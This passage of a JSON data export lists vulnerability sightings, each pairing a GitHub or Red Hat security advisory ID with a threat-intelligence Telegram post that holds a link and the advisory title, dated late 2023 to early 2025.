"RHSA-2024:0308", "type": "seen", "source": "https://t.me/ctinow/173118", "content": "https://ift.tt/M1OrEhU\nRHSA-2024:0308: Moderate: OpenShift Container Platform 4.11.57 packages and security update", "creation_timestamp": "2024-01-24T22:16:45.000000Z"}, {"uuid": "479e7c5a-94fa-4ca0-86de-b79a8ff8bd7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3C6-F2WW-XFR2", "type": "seen", "source": "https://t.me/ctinow/173112", "content": "https://ift.tt/WsLmBdV\n[GHSA-c3c6-f2ww-xfr2] Apache Airflow: pickle deserialization vulnerability in XComs", "creation_timestamp": "2024-01-24T22:07:02.000000Z"}, {"uuid": "5ea3b317-db81-437d-b72c-0f0712fb5cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CWX6-4WMF-C6XV", "type": "seen", "source": "https://t.me/ctinow/173111", "content": "https://ift.tt/E8lKNQT\n[GHSA-cwx6-4wmf-c6xv] SQL Injection in Admin download files as zip", "creation_timestamp": "2024-01-24T22:07:01.000000Z"}, {"uuid": "7e71fef1-2ba6-4998-b87f-fe133fb09e73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRQG-MWH7-Q94J", "type": "seen", "source": "https://t.me/ctinow/173110", "content": "https://ift.tt/7JWKSPB\n[GHSA-mrqg-mwh7-q94j] Host header injection in the password reset", "creation_timestamp": "2024-01-24T22:06:59.000000Z"}, {"uuid": "5acb6e81-91e0-4b66-b932-c6994efd196f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R25-68WM-JW35", "type": "seen", "source": "https://t.me/ctinow/166666", "content": "https://ift.tt/FUEheAW\n[GHSA-8r25-68wm-jw35] Authenticated (user role) arbitrary command execution by modifying `start_cmd` setting (GHSL-2023-268)", "creation_timestamp": "2024-01-11T17:47:14.000000Z"}, {"uuid": "b10ba9a2-d405-4956-9733-fe1203e3ad1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2Q6J-GQC4-4GW3", "type": "seen", "source": "https://t.me/ctinow/169021", "content": "https://ift.tt/xtUlypA\n[GHSA-2q6j-gqc4-4gw3] Breaking unlinkability in Identity Mixer using malicious keys", "creation_timestamp": "2024-01-16T22:26:55.000000Z"}, {"uuid": "2d82157d-45a7-4afc-901b-9275370724fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQCC-QF63-C2X4", "type": "seen", "source": "https://t.me/ctinow/167637", "content": "https://ift.tt/SmMJWDf\n[GHSA-wqcc-qf63-c2x4] WWBN AVideo Insufficient Entropy vulnerbaility", "creation_timestamp": "2024-01-13T00:52:01.000000Z"}, {"uuid": "6aaa534b-345f-4db7-a960-897a7e55428c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94C3-FW5R-3362", "type": "seen", "source": "https://t.me/ctinow/165727", "content": "https://ift.tt/3L1Wk7A\nCVE-2023-43813 | GLPI up to 10.0.10 sql injection (GHSA-94c3-fw5r-3362)", "creation_timestamp": "2024-01-10T12:11:10.000000Z"}, {"uuid": "03911739-1b7e-4fe5-99c9-4dd1072f7afb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FGC-89CX-W8J5", "type": "seen", "source": "https://t.me/ctinow/165710", "content": "https://ift.tt/yGi4zJC\nCVE-2023-50248 | CKAN up to 2.9.9/2.10.2 /dataset/new length parameter (GHSA-7fgc-89cx-w8j5)", "creation_timestamp": "2024-01-10T11:41:52.000000Z"}, {"uuid": "96f9496f-f36a-4e66-8395-62e93f0d08b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0113", "type": "seen", "source": "https://t.me/ctinow/165704", "content": "https://ift.tt/kMGt4Pl\nRHSA-2024:0113: Important: kernel security update", "creation_timestamp": "2024-01-10T11:17:03.000000Z"}, {"uuid": "e3ee622d-f203-40dc-99aa-e71f45e9a4c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QC92-GXC6-5F95", "type": "seen", "source": "https://t.me/ctinow/165703", "content": "https://ift.tt/PH8W75e\nCVE-2023-46726 | GLPI up to 10.0.11 LDAP Server Configuration injection (GHSA-qc92-gxc6-5f95)", "creation_timestamp": "2024-01-10T11:11:34.000000Z"}, {"uuid": "77b26e0b-5e43-4c20-a5fc-c7c406539dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QX2-6F78-W2J2", "type": "seen", "source": "https://t.me/ctinow/165702", "content": "https://ift.tt/dOu89tw\nCVE-2023-50262 | Dompdf up to 2.0.3 SVG Document Parser memory leak (GHSA-3qx2-6f78-w2j2)", "creation_timestamp": "2024-01-10T11:11:33.000000Z"}, {"uuid": "008e2908-2fe3-43e1-8a73-bd7e07fa4c51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0105", "type": "seen", "source": "https://t.me/ctinow/165675", "content": "https://ift.tt/jGVwPtY\nRHSA-2024:0105: Moderate: nss security update", "creation_timestamp": "2024-01-10T10:16:44.000000Z"}, {"uuid": "01dba07e-d11b-4a18-aa06-ffa343f6a93b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2R2-W9C7-H624", "type": "seen", "source": "https://t.me/ctinow/169175", "content": "https://ift.tt/8wlpmiE\nCVE-2019-16919 | Harbor API Access Control API Request default permission (GHSA-x2r2-w9c7-h624)", "creation_timestamp": "2024-01-17T09:41:48.000000Z"}, {"uuid": "41adaeea-d98d-4514-ab48-92f32ca4ec05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PGPJ-V85Q-H5FM", "type": "seen", "source": "https://t.me/ctinow/170265", "content": "https://ift.tt/nVxIWr3\n[GHSA-pgpj-v85q-h5fm] Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation", "creation_timestamp": "2024-01-19T16:37:09.000000Z"}, {"uuid": "ee4ada0a-0f10-4543-9f5c-cc809d359413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJJ7-7HCJ-9CPC", "type": "seen", "source": "https://t.me/ctinow/170258", "content": "https://ift.tt/1K8glqO\nCVE-2023-52077 | nexryai nexkey prior 12.23Q4.5 API Token authorization (GHSA-pjj7-7hcj-9cpc)", "creation_timestamp": "2024-01-19T16:11:59.000000Z"}, {"uuid": "e2ef2234-6c69-475f-b5a3-c08106564f08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0304", "type": "seen", "source": "https://t.me/ctinow/169961", "content": "https://ift.tt/qETBNXt\nRHSA-2024:0304: Important: RHACS 3.74 enhancement and security update", "creation_timestamp": "2024-01-18T22:17:07.000000Z"}, {"uuid": "26ca38dd-96b5-47f5-b0d0-faea29b2c99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5G9-J7R4-6QVX", "type": "seen", "source": "https://t.me/ctinow/162643", "content": "https://ift.tt/oX07lP9\n[GHSA-j5g9-j7r4-6qvx] Craft CMS Privilege Escalation", "creation_timestamp": "2024-01-03T23:11:42.000000Z"}, {"uuid": "37b2e251-d952-40be-a9e4-025c8a9cddea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6R4-5PR8-GJCP", "type": "seen", "source": "https://t.me/ctinow/162641", "content": "https://ift.tt/zOr5G8A\n[GHSA-r6r4-5pr8-gjcp] Vapor contains an integer overflow in URI leading to potential host spoofing", "creation_timestamp": "2024-01-03T22:56:52.000000Z"}, {"uuid": "33b71c46-5519-42a7-b74b-2f1dde3a1185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5G66-628F-7CVJ", "type": "seen", "source": "https://t.me/ctinow/162640", "content": "https://ift.tt/E810Hul\n[GHSA-5g66-628f-7cvj] Omniauth::MicrosoftGraph Account takeover (nOAuth)", "creation_timestamp": "2024-01-03T22:56:51.000000Z"}, {"uuid": "2c58dd17-ab37-4905-af43-26b31239b46a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27WG-99G8-2V4V", "type": "seen", "source": "https://t.me/ctinow/162639", "content": "https://ift.tt/ypA6icg\n[GHSA-27wg-99g8-2v4v] Rust EVM erroneousle handles `record_external_operation` error return", "creation_timestamp": "2024-01-03T22:56:49.000000Z"}, {"uuid": "63c03cae-d209-43c9-a7f1-9eaef44e6c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR7M-R9VM-M4WF", "type": "seen", "source": "https://t.me/ctinow/162638", "content": "https://ift.tt/ZIqEeMP\n[GHSA-vr7m-r9vm-m4wf] PrestaShop XSS can be stored in DB from \"add a message form\" in order detail page (FO)", "creation_timestamp": "2024-01-03T22:56:48.000000Z"}, {"uuid": "2f6415af-9c25-4c56-af29-1428374e2d14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGPM-Q3MQ-46RQ", "type": "seen", "source": "https://t.me/ctinow/162637", "content": "https://ift.tt/mDWnVMK\n[GHSA-xgpm-q3mq-46rq] PrestaShop some attribute not escaped in Validate::isCleanHTML method", "creation_timestamp": "2024-01-03T22:56:47.000000Z"}, {"uuid": "79dd8e52-cbfd-4498-9092-5c80cc6a6154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4V8-JGCV-9G75", "type": "seen", "source": "https://t.me/ctinow/162636", "content": "https://ift.tt/J1XHftK\n[GHSA-p4v8-jgcv-9g75] safe_pqc_kyber leaks parts of secret keys", "creation_timestamp": "2024-01-03T22:56:46.000000Z"}, {"uuid": "5d4c0fe4-38ea-40a8-952e-19de15ba6681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPJW-97P8-P2XP", "type": "seen", "source": "https://t.me/ctinow/162632", "content": "https://ift.tt/dzb94Si\n[GHSA-rpjw-97p8-p2xp] Gila CMS SQL Injection", "creation_timestamp": "2024-01-03T22:51:42.000000Z"}, {"uuid": "f8dd9ca7-cf92-45d0-b7a0-347d11a56b35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFXF-76HV-V4W4", "type": "seen", "source": "https://t.me/ctinow/162631", "content": "https://ift.tt/mYQCNvx\n[GHSA-vfxf-76hv-v4w4] User-provided environment values allow execution on macOS agents", "creation_timestamp": "2024-01-03T22:41:58.000000Z"}, {"uuid": "b86f5e6a-b778-452d-b4fd-30bab3d0e722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V977-H4HM-RRFF", "type": "seen", "source": "https://t.me/ctinow/167638", "content": "https://ift.tt/cOYnFK5\n[GHSA-v977-h4hm-rrff] WWBN AVideo Improper Restriction of Excessive Authentication Attempts vulnerability", "creation_timestamp": "2024-01-13T00:52:03.000000Z"}, {"uuid": "45542605-4450-4d72-91a3-6b3c3311ca94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2V2-HPH8-Q5XP", "type": "seen", "source": "https://t.me/ctinow/173410", "content": "https://ift.tt/8nTbA4r\nCVE-2023-51701 | fastify-reply-from up to 9.5.x Reverse Proxy request smuggling (GHSA-v2v2-hph8-q5xp)", "creation_timestamp": "2024-01-25T12:41:21.000000Z"}, {"uuid": "5a8be298-170c-47a5-86c6-b4105d646427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0409", "type": "seen", "source": "https://t.me/ctinow/172978", "content": "https://ift.tt/Vb6JEDC\nRHSA-2024:0409: Moderate: oniguruma security update", "creation_timestamp": "2024-01-24T18:21:22.000000Z"}, {"uuid": "98c048a3-321a-4191-a11b-733af70b1649", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0387", "type": "seen", "source": "https://t.me/ctinow/172669", "content": "https://ift.tt/zgKh98F\nRHSA-2024:0387: Moderate: php:8.1 security update", "creation_timestamp": "2024-01-24T11:16:12.000000Z"}, {"uuid": "220dd052-e7fa-4783-b520-8df34e02b4f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PQ7-52MG-HR42", "type": "seen", "source": "https://t.me/ctinow/172588", "content": "https://ift.tt/D54yHPz\nCVE-2024-22049 | John Nunemaker httparty up to 0.20.0 Web Parameter unknown vulnerability (GHSA-5pq7-52mg-hr42)", "creation_timestamp": "2024-01-24T09:11:54.000000Z"}, {"uuid": "87922eda-9993-4e0d-b28d-9fb638bb23d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X22X-5PP9-8V7F", "type": "seen", "source": "https://t.me/ctinow/173148", "content": "https://ift.tt/XJ4nBkO\n[GHSA-x22x-5pp9-8v7f] Content-Security-Policy disabled by Red Hat Dependency Analytics Jenkins Plugin", "creation_timestamp": "2024-01-24T23:06:39.000000Z"}, {"uuid": "543ebcc6-d972-4bd3-b5a1-068897ae4741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0463", "type": "seen", "source": "https://t.me/ctinow/172961", "content": "https://ift.tt/ThBYgaW\nRHSA-2024:0463: Moderate: rpm security update", "creation_timestamp": "2024-01-24T18:16:24.000000Z"}, {"uuid": "3bf1842e-6fc6-4055-86c8-208b6659dac2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0466", "type": "seen", "source": "https://t.me/ctinow/172960", "content": "https://ift.tt/9UOeYLA\nRHSA-2024:0466: Moderate: python3.9 security update", "creation_timestamp": "2024-01-24T18:16:23.000000Z"}, {"uuid": "9c0e6c37-7c32-44f0-8fb8-6236404389db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0419", "type": "seen", "source": "https://t.me/ctinow/172932", "content": "https://ift.tt/iSbYdm9\nRHSA-2024:0419: Moderate: c-ares security update", "creation_timestamp": "2024-01-24T17:17:02.000000Z"}, {"uuid": "5c16ba69-784c-4932-b49f-a96e07b0598c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCVP-2CC7-JRWR", "type": "seen", "source": "https://t.me/ctinow/171976", "content": "https://ift.tt/tOpf5Zx\n[GHSA-hcvp-2cc7-jrwr] changedetection.io API endpoint is not secured with API token", "creation_timestamp": "2024-01-23T14:07:03.000000Z"}, {"uuid": "70ebd6b3-70f6-41e9-a3d4-01f4d100cd70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JGPH-W8RH-XF5P", "type": "seen", "source": "https://t.me/ctinow/171964", "content": "https://ift.tt/Xj5t7Jf\n[GHSA-jgph-w8rh-xf5p] View permissions are bypassed for paginated lists of ORM data", "creation_timestamp": "2024-01-23T13:56:10.000000Z"}, {"uuid": "b15e532b-5a95-41e5-8f14-227ca835e841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM2J-QVQ3-J29V", "type": "seen", "source": "https://t.me/ctinow/171963", "content": "https://ift.tt/G9zwN4Y\n[GHSA-qm2j-qvq3-j29v] Record titles for restricted records can be viewed if exposed by GridFieldAddExistingAutocompleter", "creation_timestamp": "2024-01-23T13:56:09.000000Z"}, {"uuid": "fdb36004-7231-405d-ac99-382293b5dd15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W7JX-J77M-WP65", "type": "seen", "source": "https://t.me/ctinow/172223", "content": "https://ift.tt/umgKdXq\nCVE-2024-21911 | TinyMCE up to 5.5.x Editor cross site scripting (GHSA-w7jx-j77m-wp65)", "creation_timestamp": "2024-01-23T19:01:48.000000Z"}, {"uuid": "d86651ff-d7af-4601-baa6-daf84ef000e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHVV-3JWW-C487", "type": "seen", "source": "https://t.me/ctinow/160163", "content": "https://ift.tt/Ei6uUCG\n[GHSA-xhvv-3jww-c487] ActiveAdmin CSV Injection leading to sensitive information disclosure", "creation_timestamp": "2023-12-28T19:56:34.000000Z"}, {"uuid": "99f28120-0398-445e-8d0b-ce2dc985d4df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0094", "type": "seen", "source": "https://t.me/ctinow/167203", "content": "https://ift.tt/QHDtk9S\nCVE-2023-6927 | Red Hat Keycloak JARM Response redirect (RHSA-2024:0094)", "creation_timestamp": "2024-01-12T11:36:32.000000Z"}, {"uuid": "31ffdd72-21cc-45de-af6a-6939a96fb31e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MQ2-GC4J-CMW6", "type": "seen", "source": "https://t.me/ctinow/166678", "content": "https://ift.tt/TzRKu1B\n[GHSA-4mq2-gc4j-cmw6] Django Template Engine Vulnerable to XSS", "creation_timestamp": "2024-01-11T17:56:50.000000Z"}, {"uuid": "78fbc8a5-7547-46e4-91c1-5f350fc81ef1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP3J-273X-3JXC", "type": "seen", "source": "https://t.me/ctinow/166663", "content": "https://ift.tt/rTN15kZ\nCVE-2023-50722 | XWiki Platform Admin Section cross site scripting (GHSA-cp3j-273x-3jxc)", "creation_timestamp": "2024-01-11T17:37:07.000000Z"}, {"uuid": "5aceff9e-0836-44d9-bba8-ef2a0e7832a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7831", "type": "seen", "source": "https://t.me/ctinow/162780", "content": "https://ift.tt/2xf3c9e\nRHSA-2023:7831: Important: OpenShift Container Platform 4.14.7 bug fix and security update", "creation_timestamp": "2024-01-04T06:16:51.000000Z"}, {"uuid": "579b6a13-45fc-41f9-a70b-90eb56d231ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0033", "type": "seen", "source": "https://t.me/ctinow/162779", "content": "https://ift.tt/F0zVBWq\nRHSA-2024:0033: Moderate: Red Hat Virtualization Host 4.4.z SP 1 security update", "creation_timestamp": "2024-01-04T06:16:50.000000Z"}, {"uuid": "51208e2e-ad2e-42ac-97e9-37342c74fc73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0046", "type": "seen", "source": "https://t.me/ctinow/162778", "content": "https://ift.tt/Csuy3jx\nRHSA-2024:0046: Important: squid:4 security update", "creation_timestamp": "2024-01-04T06:16:49.000000Z"}, {"uuid": "555e1e85-4ee5-4688-add1-ae79e0870b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-445X-C8QQ-QFR9", "type": "seen", "source": "https://t.me/ctinow/172373", "content": "https://ift.tt/winNgf7\nCVE-2023-50090 | ureport2 up to 2.2.9 HTTP POST Request saveReportFile Privilege Escalation (GHSA-445x-c8qq-qfr9)", "creation_timestamp": "2024-01-23T23:02:23.000000Z"}, {"uuid": "3861b72d-b5ae-4d64-8cf3-02813089821d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-733R-8XCP-W9MR", "type": "seen", "source": "https://t.me/ctinow/172878", "content": "https://ift.tt/kvVLU9a\nCVE-2024-21641 | Flarum up to 1.8.4 /logout redirect (GHSA-733r-8xcp-w9mr)", "creation_timestamp": "2024-01-24T16:16:18.000000Z"}, {"uuid": "4ab2ca16-b577-4418-b369-2e5f3117d476", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0093", "type": "seen", "source": "https://t.me/ctinow/165093", "content": "https://ift.tt/ZJT7NP0\nRHSA-2024:0093: Moderate: nss security update", "creation_timestamp": "2024-01-09T16:17:19.000000Z"}, {"uuid": "dfd853d9-61a6-458b-abcf-b1569931460d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0015", "type": "seen", "source": "https://t.me/ctinow/161651", "content": "https://ift.tt/x4AfLoB\nRHSA-2024:0015: Important: tigervnc security update", "creation_timestamp": "2024-01-02T10:17:07.000000Z"}, {"uuid": "1ac2669f-7095-43a1-b318-4fced766f3fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0028", "type": "seen", "source": "https://t.me/ctinow/161650", "content": "https://ift.tt/lbSNAIt\nRHSA-2024:0028: Important: thunderbird security update", "creation_timestamp": "2024-01-02T10:17:06.000000Z"}, {"uuid": "726fc1c5-f5f1-4721-b68e-6e9d31c398c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34MR-6Q8X-G9R6", "type": "seen", "source": "https://t.me/ctinow/161310", "content": "https://ift.tt/AG8Qq2c\nCVE-2023-49795 | MindsDB up to 23.11.4.0 file.py server-side request forgery (GHSA-34mr-6q8x-g9r6)", "creation_timestamp": "2024-01-01T14:31:22.000000Z"}, {"uuid": "6d2a8a3d-fe2e-43b8-a1b8-5c68f44af4e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGQJ-HPHF-9588", "type": "seen", "source": "https://t.me/ctinow/166369", "content": "https://ift.tt/9oOMZsF\nCVE-2023-42183 | lockss-daemon up to 1.76.x cleanName name unicode encoding (GHSA-mgqj-hphf-9588)", "creation_timestamp": "2024-01-11T08:56:59.000000Z"}, {"uuid": "68ecb004-873d-48f6-9c09-9e82bdc80676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5J8-JXJ3-HH36", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/779", "content": "https://github.com/Cacti/cacti/security/advisories/GHSA-c5j8-jxj3-hh36\n\ncve-2025-22604\n#github #poc", "creation_timestamp": "2025-02-07T16:16:05.000000Z"}, {"uuid": "154f3c5f-4a63-4e78-9d1d-b60202d74edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0208", "type": "seen", "source": "https://t.me/ctinow/166889", "content": "https://ift.tt/X50KWyD\nRHSA-2024:0208: Low: openssl security update", "creation_timestamp": "2024-01-11T22:51:59.000000Z"}, {"uuid": "5252d207-7f67-4234-9831-db04e949c9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWVG-2739-22V7", "type": "seen", "source": "https://t.me/ctinow/160675", "content": "https://ift.tt/cl7ArEp\n[GHSA-fwvg-2739-22v7] Miniflare vulnerable to Server-Side Request Forgery (SSRF)", "creation_timestamp": "2023-12-29T20:46:42.000000Z"}, {"uuid": "09bd1092-242e-4ba9-92e1-1676b61a8c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FPPH-MQC8-H6Q5", "type": "seen", "source": "https://t.me/ctinow/160664", "content": "https://ift.tt/1Rjxv90\n[GHSA-fpph-mqc8-h6q5] Unrestricted File Upload affecting automad", "creation_timestamp": "2023-12-29T19:47:15.000000Z"}, {"uuid": "6ab09f33-3f5c-488a-a86a-0d78d781c243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWMG-RJ6G-W99P", "type": "seen", "source": "https://t.me/ctinow/158765", "content": "https://ift.tt/GSt09AZ\nCVE-2023-48691 | azure-rtos netxduo up to 6.2.1 IGMP out-of-bounds write (GHSA-fwmg-rj6g-w99p)", "creation_timestamp": "2023-12-23T10:21:56.000000Z"}, {"uuid": "2dc1121c-bc63-45d4-b1e8-b940fa4b3aab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8959-RFXH-R4J4", "type": "seen", "source": "https://t.me/ctinow/164521", "content": "https://ift.tt/YceDhso\n[GHSA-8959-rfxh-r4j4] XWiki vulnerable to Denial of Service attack through attachments", "creation_timestamp": "2024-01-08T17:46:35.000000Z"}, {"uuid": "ed1b909c-68f6-4735-8386-74af1f2ce10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P7W6-62RQ-VRF9", "type": "seen", "source": "https://t.me/ctinow/158782", "content": "https://ift.tt/4zkqg5b\nCVE-2023-48693 | azure-rtos threadx up to 6.2.1 input validation (GHSA-p7w6-62rq-vrf9)", "creation_timestamp": "2023-12-23T11:41:49.000000Z"}, {"uuid": "e30243bd-cc1f-4925-a93e-826777c0c894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVHJ-4QFH-Q2HM", "type": "seen", "source": "https://t.me/ctinow/158780", "content": "https://ift.tt/107UD9c\nCVE-2023-47106 | Traefik up to 2.10.5/3.0.0-beta4 input validation (GHSA-fvhj-4qfh-q2hm)", "creation_timestamp": 